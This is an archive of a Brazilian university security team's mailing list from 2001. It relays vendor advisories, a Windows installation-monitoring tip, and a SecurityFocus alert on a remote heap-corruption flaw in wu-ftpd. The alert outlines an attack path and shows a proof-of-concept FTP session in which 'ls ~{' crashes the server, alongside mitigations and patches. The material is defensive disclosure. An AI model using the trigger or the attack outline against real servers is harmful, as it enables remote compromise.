2001 10:43:54 -0200 Subject: [SECURITY-L] Boletim de noticias Message-ID: <20011127104354.A17705@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticias e/ou revistas eletronicas: 26/11/2001: ----------- SecurityFocus.com Newsletter #120 Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2001/11/b14.txt -- Equipe de Seguranca em Sitemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Wed Nov 28 12:37:28 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Wed, 28 Nov 2001 12:37:28 -0200 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20011128123728.A17832@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 26/11/2001: ----------- Red Hat, Inc. Red Hat Security Advisory (RHSA-2001:157-06) Assunto: vulnerabilidade de seguranca no package "wu-ftp". http://www.security.unicamp.br/docs/bugs/2001/11/v55.txt 27/11/2001: ----------- Anúncio de segurança do Conectiva Linux (CLA-2001:440 - rpm) Assunto: Vulnerabilidade de consulta no RPM. http://www.security.unicamp.br/docs/bugs/2001/11/v53.txt Anúncio de segurança do Conectiva Linux (CLA-2001:441 - openldap) Assunto: Senhas MD5 locais não funcionam se migradas para o servidor LDAP. http://www.security.unicamp.br/docs/bugs/2001/11/v54.txt Mandrake Linux Security Update Advisory (MDKSA-2001:077-1) Assunto: vulnerabilidade de seguranca no package "apache". http://www.security.unicamp.br/docs/bugs/2001/11/v56.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Wed Nov 28 16:18:01 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Wed, 28 Nov 2001 16:18:01 -0200 Subject: [SECURITY-L] Monitoramento de instalacoes de programas em ambiente Microsoft Message-ID: <20011128161800.A27400@ccuec.unicamp.br> ----- Forwarded message from Reginaldo Ferreira - Regi ----- From: "Reginaldo Ferreira - Regi" Date: Wed, 24 Oct 2001 07:59:24 -0200 X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) A microsoft lancou uma ferramenta free para monitorar instalacoes de programas nas estacoes. Leia abaixo: RASTREAR AS INSTALACOES DE PROGRAMAS Quando voce comeca a instalar programas nas workstations de sua empresa, voce pode perder o controle de quais programas estao sendo executados em que maquinas. Ao inves de perder um bom tempo pesquisando listagens de programas, se voce estiver tentando instalar um determinado software e encontrar problemas que queira resolver, ou se quiser rastrear as instalacoes de software para poder remove-los com seguranca mais tarde, a Microsoft oferece o download gratuito de uma ferramenta chamada Installation Monitor, que faz exatamente essa tarefa. O download pode ser feito na pagina: Installation Monitor e um programa de linha de comando, entao voce precisa passar os parbmetros operacionais manualmente. A melhor forma de fazer isso e abrir um prompt de comando, ir ao diretorio onde deseja instalar a ferramenta, e digitar instaler logfile (onde logfile e o nome do arquivo de log de instalacao que voce quer gerar). Nao pressione Enter ainda - ao inves disso, deixe um espaco (trailing) antes do nome do arquivo de log, e depois arraste e solte na janela do prompt de comando do arquivo installer que estiver executando. Este procedimento vai copiar automaticamente o path e o nome do arquivo do installer na linha de comando. Pressione Enter e a ferramenta sera executada, documentando todas as alteracoes feitas pelo programa em questao. Installation Monitor tambem tem algumas opcoes de linha de comando, que podem ser passadas depois do nome do arquivo de log: -9: Engana a aplicacao, e diz que Windows 95 e o sistema operacional hospedeiro. (Isto e util se voce tiver uma aplicacao mais antiga, que opera em Windows 2000, mas o installer falha, porque nao pode descobrir que sistema operacional esta sendo executado). -r Forca uma falha para qualquer tentativa de fazer um scan com curinga no diretorio raiz de qualquer drive. -dA: Mostra todos os erros. -dE: Mostra todos os eventos do debug. -dC: Mostra todas as chamadas de API. Se voce quiser ver os resultados do log, execute o programa showinst com o arquivo de log como parbmetro. Ao passar -c como um parbmetro, o conteudo de todos os arquivos de texto criados sera exibido. Para desfazer todas as alteracoes logadas, execute o programa undoinst com o arquivo de log passado como um parbmetro, e qualquer uma das seguintes opcoes: -r: Executa o desfazer, mas tambem substitui o conteudo do arquivo de log por um script, para refazer a instalacao. -v: Saida Verbose Reginaldo Ferreira regi em lepper.com.br ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Nov 28 16:41:39 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Wed, 28 Nov 2001 16:41:39 -0200 Subject: [SECURITY-L] Wu-Ftpd File Globbing Heap Corruption Vulnerability Message-ID: <20011128164139.C27400@ccuec.unicamp.br> ----- Forwarded message from Nelson Murilo ----- From: Nelson Murilo Subject: [S] *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability To: seguranca em pangeia.com.br Date: Wed, 28 Nov 2001 15:51:47 -0200 --------------------------------------------------------------------------- Security Alert Subject: Wu-Ftpd File Globbing Heap Corruption Vulnerability BUGTRAQ ID: 3581 CVE ID: CVE-MAP-NOMATCH Published: Nov 27, 2001 Updated: Nov 28, 2001 01:12:56 Remote: Yes Local: No Availability: Always Authentication: Not Required Credibility: Vendor Confirmed Ease: No Exploit Available Class: Failure to Handle Exceptional Conditions Impact: 10.0 Severity: 10.0 Urgency: 8.2 Last Change: Initial analysis. --------------------------------------------------------------------------- Vulnerable Systems: Washington University wu-ftpd 2.6.1 + Caldera OpenLinux Server 3.1 + Caldera OpenLinux Workstation 3.1 + Cobalt Qube 1.0 + Conectiva Linux 7.0 + Conectiva Linux 6.0 + MandrakeSoft Corporate Server 1.0.1 + MandrakeSoft Linux Mandrake 8.1 + MandrakeSoft Linux Mandrake 8.0 ppc + MandrakeSoft Linux Mandrake 8.0 + MandrakeSoft Linux Mandrake 7.2 + MandrakeSoft Linux Mandrake 7.1 + MandrakeSoft Linux Mandrake 7.0 + MandrakeSoft Linux Mandrake 6.1 + MandrakeSoft Linux Mandrake 6.0 + RedHat Linux 7.2 noarch + RedHat Linux 7.2 ia64 + RedHat Linux 7.2 i686 + RedHat Linux 7.2 i586 + RedHat Linux 7.2 i386 + RedHat Linux 7.2 athlon + RedHat Linux 7.2 alpha + RedHat Linux 7.1 noarch + RedHat Linux 7.1 ia64 + RedHat Linux 7.1 i686 + RedHat Linux 7.1 i586 + RedHat Linux 7.1 i386 + RedHat Linux 7.1 alpha + RedHat Linux 7.0 sparc + RedHat Linux 7.0 i386 + RedHat Linux 7.0 alpha + TurboLinux TL Workstation 6.1 + TurboLinux Turbo Linux 6.0.5 + TurboLinux Turbo Linux 6.0.4 + TurboLinux Turbo Linux 6.0.3 + TurboLinux Turbo Linux 6.0.2 + TurboLinux Turbo Linux 6.0.1 + TurboLinux Turbo Linux 6.0 + Wirex Immunix OS 7.0-Beta + Wirex Immunix OS 7.0 Washington University wu-ftpd 2.6.0 + Cobalt Qube 1.0 + Conectiva Linux 5.1 + Conectiva Linux 5.0 + Conectiva Linux 4.2 + Conectiva Linux 4.1 + Conectiva Linux 4.0es + Conectiva Linux 4.0 + Debian Linux 2.2 sparc + Debian Linux 2.2 powerpc + Debian Linux 2.2 arm + Debian Linux 2.2 alpha + Debian Linux 2.2 68k + Debian Linux 2.2 + RedHat Linux 6.2 sparc + RedHat Linux 6.2 i386 + RedHat Linux 6.2 alpha + RedHat Linux 6.1 sparc + RedHat Linux 6.1 i386 + RedHat Linux 6.1 alpha + RedHat Linux 6.0 sparc + RedHat Linux 6.0 i386 + RedHat Linux 6.0 alpha + RedHat Linux 5.2 sparc + RedHat Linux 5.2 i386 + RedHat Linux 5.2 alpha + S.u.S.E. Linux 6.4ppc + S.u.S.E. Linux 6.4alpha + S.u.S.E. Linux 6.4 + S.u.S.E. Linux 6.3 ppc + S.u.S.E. Linux 6.3 alpha + S.u.S.E. Linux 6.3 + S.u.S.E. Linux 6.2 + S.u.S.E. Linux 6.1 alpha + S.u.S.E. Linux 6.1 + TurboLinux Turbo Linux 4.0 + Wirex Immunix OS 6.2 Washington University wu-ftpd 2.5.0 + Caldera eDesktop 2.4 + Caldera eServer 2.3.1 + Caldera eServer 2.3 + Caldera OpenLinux 2.4 + Caldera OpenLinux Desktop 2.3 + RedHat Linux 6.0 sparc + RedHat Linux 6.0 i386 + RedHat Linux 6.0 alpha Summary: Wu-Ftpd contains a remotely exploitable heap corruption bug. Impact: A remote attacker may execute arbitrary code on the vulnerable server. Technical Description: Wu-Ftpd is an ftp server based on the BSD ftpd that is maintained by Washington University. Wu-Ftpd allows for clients to organize files for ftp actions based on "file globbing" patterns. File globbing is also used by various shells. The implementation of file globbing included in Wu-Ftpd contains a heap corruption vulnerability that may allow for an attacker to execute arbitrary code on a server remotely. During the processing of a globbing pattern, the Wu-Ftpd implementation creates a list of the files that match. The memory where this data is stored is on the heap, allocated using malloc(). The globbing function simply returns a pointer to the list. It is up to the calling functions to free the allocated memory. If an error occurs processing the pattern, memory will not be allocated and a variable indicating this should be set. The calling functions must check the value of this variable before attempting to use the globbed filenames (and later freeing the memory). When certain globbing patterns are processed, the globbing function does not set this variable when an error occurs. As a result of this, Wu-Ftpd may eventually attempt to free uninitialized memory. There are a number of possibly exploitable conditions. If this region of memory contained user-controllable data before the free call, it may be possible to have an arbitrary word in memory overwritten with an arbitrary value. This can lead to execution of arbitrary code if function pointers or return addresses are overwritten. If anonymous FTP is not enabled, valid user credentials are required to exploit this vulnerability. This vulnerability was initially scheduled for public release on December 3, 2001. However, Red Hat has made details public as of November 27, 2001. As a result, we are forced to warn other users of the vulnerable product, so that they may take appropriate actions. Attack Scenarios: To exploit this vulnerability, an attacker must have either valid credentials required to log in as an FTP user, or anonymous access must be enabled. The attacker must ensure that a maliciously constructed malloc header containing the target address and it's replacement value are in the right location in the uninitialized part of the heap. The attacker must also place shellcode in server process memory. The attacker must send an FTP command containing a specific globbing pattern that does not set the error variable. When the server attempts to free the memory used to store the globbed filenames, the target word in memory will be overwritten. If an attacker overwrites a function pointer or return address with a pointer to the shellcode, it may be executed by the server process. Exploits: The following (from the CORE advisory) demonstrates the existence of this vulnerability: ftp> open localhost Connected to localhost (127.0.0.1). 220 sasha FTP server (Version wu-2.6.1-18) ready. Name (localhost:root): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls ~{ 227 Entering Passive Mode (127,0,0,1,241,205) 421 Service not available, remote server has closed connection 1405 ? S 0:00 ftpd: accepting connections on port 21 7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd 26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 26265 tty3 R 0:00 bash -c ps ax | grep ftpd (gdb) at 26256 Attaching to program: /usr/sbin/wu.ftpd, process 26256 Symbols already loaded for /lib/libcrypt.so.1 Symbols already loaded for /lib/libnsl.so.1 Symbols already loaded for /lib/libresolv.so.2 Symbols already loaded for /lib/libpam.so.0 Symbols already loaded for /lib/libdl.so.2 Symbols already loaded for /lib/i686/libc.so.6 Symbols already loaded for /lib/ld-linux.so.2 Symbols already loaded for /lib/libnss_files.so.2 Symbols already loaded for /lib/libnss_nisplus.so.2 Symbols already loaded for /lib/libnss_nis.so.2 0x40165544 in __libc_read () from /lib/i686/libc.so.6 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. __libc_free (mem=0x61616161) at malloc.c:3136 3136 in malloc.c Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb em securityfocus.com Mitigating Strategies: This vulnerability is remotely exploitable. Restricting access to the network port, (TCP port 21 is standard for FTP), will block clients from unauthorized networks. With some operating systems, anonymous FTP is enabled by default. Anonymous FTP is often in use on public FTP sites, most often software repositories. It is basically a guest account with access to download files from within a restricted environment. This vulnerability is exploitable by clients logged in through anonymous FTP. Anonymous FTP should be disabled immediately until fixes are available, as it would allow any host on the Internet who can connect to the service to exploit this vulnerability. It is a good idea to disable it normally unless it is absolutely necessary (in which case the FTP server should be on a dedicated, isolated host). Stack and other memory protection schemes may complicate exploitability, and/or prevent commonly available exploits from working. This should not be relied upon for security. This vulnerability involves 'poking' words in memory. This means that there are many different ways that it may be exploited. Making the stack non-executable or checking the integrity of stack variables may not be enough to prevent all possibile methods of exploitation. It is advised to disable the service and use alternatives until fixes are available. Solutions: Vendor notified on Nov 14, 2001. Fixes will be available from the author as well as from vendors who ship products that include Wu-Ftpd as core or optional components. This vulnerability was initially scheduled for public release on December 3, 2001. Red Hat pre-emptively released an advisory on November 27, 2001. As a result, other vendors may not yet have fixes available. This record will be updated as fixes from various vendors become available. For Washington University wu-ftpd 2.6.1: Red Hat RPM 6.2 alpha wu-ftpd-2.6.1-0.6x.21.alpha.rpm ftp://updates.redhat.com/6.2/en/os/alpha/wu-ftpd-2.6.1-0.6x.21.alpha.rpm Red Hat RPM 6.2 sparc wu-ftpd-2.6.1-0.6x.21.sparc.rpm ftp://updates.redhat.com/6.2/en/os/sparc/wu-ftpd-2.6.1-0.6x.21.sparc.rpm Red Hat RPM 7.0 alpha wu-ftpd-2.6.1-16.7x.1.alpha.rpm ftp://updates.redhat.com/7.0/en/os/alpha/wu-ftpd-2.6.1-16.7x.1.alpha.rpm Red Hat RPM 7.0 i386 wu-ftpd-2.6.1-16.7x.1.i386.rpm ftp://updates.redhat.com/7.0/en/os/i386/wu-ftpd-2.6.1-16.7x.1.i386.rpm Red Hat RPM 7.1 alpha wu-ftpd-2.6.1-16.7x.1.alpha.rpm ftp://updates.redhat.com/7.1/en/os/alpha/wu-ftpd-2.6.1-16.7x.1.alpha.rpm Red Hat RPM 7.1 i386 wu-ftpd-2.6.1-16.7x.1.i386.rpm ftp://updates.redhat.com/7.1/en/os/i386/wu-ftpd-2.6.1-16.7x.1.i386.rpm Red Hat RPM 7.1 ia64 wu-ftpd-2.6.1-16.7x.1.ia64.rpm ftp://updates.redhat.com/7.1/en/os/ia64/wu-ftpd-2.6.1-16.7x.1.ia64.rpm Red Hat RPM 7.2 i386 wu-ftpd-2.6.1-20.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/wu-ftpd-2.6.1-20.i386.rpm Red Hat RPM 6.2 i386 wu-ftpd-2.6.1-0.6x.21.i386.rpm ftp://updates.redhat.com/6.2/en/os/i386/wu-ftpd-2.6.1-0.6x.21.i386.rpm Credit: Condition first reported by Matt Power, deemed non-exploitable. Rediscovered and exploitability later confirmed by Luciano Notarfrancesco and Juan Pablo Martinez Kuhn from Core Security Technologies, Buenos Aires, Argentina. References: advisory: RedHat RHSA-2001:157-06: Updated wu-ftpd packages are available http://www.securityfocus.com/advisories/3680 web page: CORE SDI Homepage (CORE) http://www.core-sdi.com web page: Wu-Ftpd Homepage (Washington University) http://www.wu-ftpd.org ChangeLog: Nov 26, 2001: Initial analysis. --------------------------------------------------------------------------- HOW TO INTERPRET THIS ALERT BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by SecurityFocus.com. CVE ID: This is a unique identifier assigned to the vulnerability by the CVE. Published: The date the vulnerability was first made public. Updated: The date the information was last updated. Remote: Whether this is a remotely exploitable vulnerability. Local: Whether this is a locally exploitable vulnerability. Credibility: Describes how credible the information about the vulnerability is. Possible values are: Conflicting Reports: The are multiple conflicting about the existance of the vulnerability. Single Source: There is a single non-reliable source reporting the existence of the vulnerability. Reliable Source: There is a single reliable source reporting the existence of the vulnerability. Conflicting Details: There is consensus on the existence of the vulnerability but not it's details. Multiple Sources: There is consensus on the existence and details of the vulnerability. Vendor Confirmed: The vendor has confirmed the vulnerability. Class: The class of vulnerability. Possible values are: Boundary Condition Error, Access Validation Error, Origin Validation Error, Input Valiadtion Error, Failure to Handle Exceptional Conditions, Race Condition Error, Serialization Error, Atomicity Error, Environment Error, and Configuration Error. Ease: Rates how easiliy the vulnerability can be exploited. Possible values are: No Exploit Available, Exploit Available, and No Exploit Required. Impact: Rates the impact of the vulnerability. It's range is 1 through 10. Severity: Rates the severity of the vulnerability. It's range is 1 through 10. It's computed from the impact rating and remote flag. Remote vulnerabiliteis with a high impact rating receive a high severity rating. Local vulnerabilities with a low impact rating receive a low severity rating. Urgency: Rates how quickly you should take action to fix or mitigate the vulnerability. It's range is 1 through 10. It's computed from the severity rating, the ease rating, and the credibility rating. High severity vulnerabilities with a high ease rating, and a high confidence rating have a higher urgency rating. Low severity vulnerabilities with a low ease rating, and a low confidence rating have a lower urgency rating. Last Change: The last change made to the vulnerability information. Vulnerable Systems: The list of vulnerable systems. A '+' preceding a system name indicates that one of the system components is vulnerable vulnerable. For example, Windows 98 ships with Internet Explorer. So if a vulnerability is found in IE you may see something like: Microsoft Internet Explorer + Microsoft Windows 98 Non-Vulnerable Systems: The list of non-vulnerable systems. Summary: A concise summary of the vulnerability. Impact: The impact of the vulnerability. Technical Description: The in-depth description of the vulnerability. Attack Scenarios: Ways an attacker may make use of the vulnerability. Exploits: Exploit intructions or programs. Mitigating Strategies: Ways to mitigate the vulnerability. Solutions: Solutions to the vulnerability. Credit: Information about who disclosed the vulnerability. References: Sources of information on the vulnerability. Related Resources: Resources that might be of additional value. ChangeLog: History of changes to the vulnerability record. --------------------------------------------------------------------------- Copyright 2001 SecurityFocus.com ---------- SecurityFocus - the leading provider of Security Intelligence Services for business. Visit our website at www.securityfocus.com ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Nov 30 15:31:34 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Fri, 30 Nov 2001 15:31:34 -0200 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20011130153134.A5074@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 22/11/2001: ----------- Caldera International, Inc. Security Advisory (CSSA-2001-039.0) Assunto: Linux - IMP/HORDE cross site scripting vulnerability. http://www.security.unicamp.br/docs/bugs/2001/11/v59.txt 26/11/2001: ----------- Caldera International, Inc. Security Advisory (CSSA-2001-040.0) Assunto: Linux - Format String Problem in Cyrus-SASL. http://www.security.unicamp.br/docs/bugs/2001/11/v60.txt 27/11/2001: ----------- Red Hat, Inc. Red Hat Security Advisory (RHSA-2001:156-05) Assunto: vulnerabilidade de seguranca no package "postfix". http://www.security.unicamp.br/docs/bugs/2001/11/v57.txt 28/11/2001: ----------- Cisco Security Advisory Assunto: A Vulnerability in IOS Firewall Feature Set. http://www.security.unicamp.br/docs/bugs/2001/11/v58.txt SuSE Security Announcement (SuSE-SA:2001:043) Assunto: vulnerabilidade de seguranca no package "wuftpd". http://www.security.unicamp.br/docs/bugs/2001/11/v62.txt Caldera International, Inc. Security Advisory (CSSA-2001-041.0) Assunto: Linux - Vulnerability in wu-ftpd http://www.security.unicamp.br/docs/bugs/2001/11/v63.txt Immunix OS Security Advisory (IMNX-2001-70-036-01) Assunto: vulnerabilidade de seguranca no package "wu-ftpd". http://www.security.unicamp.br/docs/bugs/2001/11/v64.txt 29/11/2001: ----------- Anúncio de segurança do Conectiva Linux (CLA-2001:442) Assunto: vulnerabilidade de seguranca no package "wu-ftpd". http://www.security.unicamp.br/docs/bugs/2001/11/v65.txt CERT Advisory (CA-2001-33) Assunto: Multiple Vulnerabilities in WU-FTPD. http://www.security.unicamp.br/docs/bugs/2001/11/v66.txt Caldera International, Inc. Security Advisory (CSSA-2001-SCO.35) Assunto: OpenServer: setcontext and sysi86 vulnerabilities. http://www.security.unicamp.br/docs/bugs/2001/11/v68.txt Immunix OS Security Advisory (IMNX-2001-70-036-02) Assunto: vulnerabilidade de seguranca no package "wu-ftpd". http://www.security.unicamp.br/docs/bugs/2001/11/v69.txt 30/11/2001: ----------- Alerta-CAIS: Vulnerabilidade Remota no Wu-ftpd http://www.security.unicamp.br/docs/bugs/2001/11/v67.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Fri Nov 30 16:30:40 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Fri, 30 Nov 2001 16:30:40 -0200 Subject: [SECURITY-L] Boletins de noticias Message-ID: <20011130163040.A26608@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticias e/ou revistas eletronicas: 28/11/2001: ----------- The SANS Weekly Security News Overview (Vol. 3, Num. 48) Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2001/11/b15.txt 30/11/2001: ----------- LinuxSecurity Brasil Edição Especial (no. 34) Fonte: Linux Security http://www.security.unicamp.br/docs/informativos/2001/11/b16.html -- Equipe de Seguranca em Sitemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br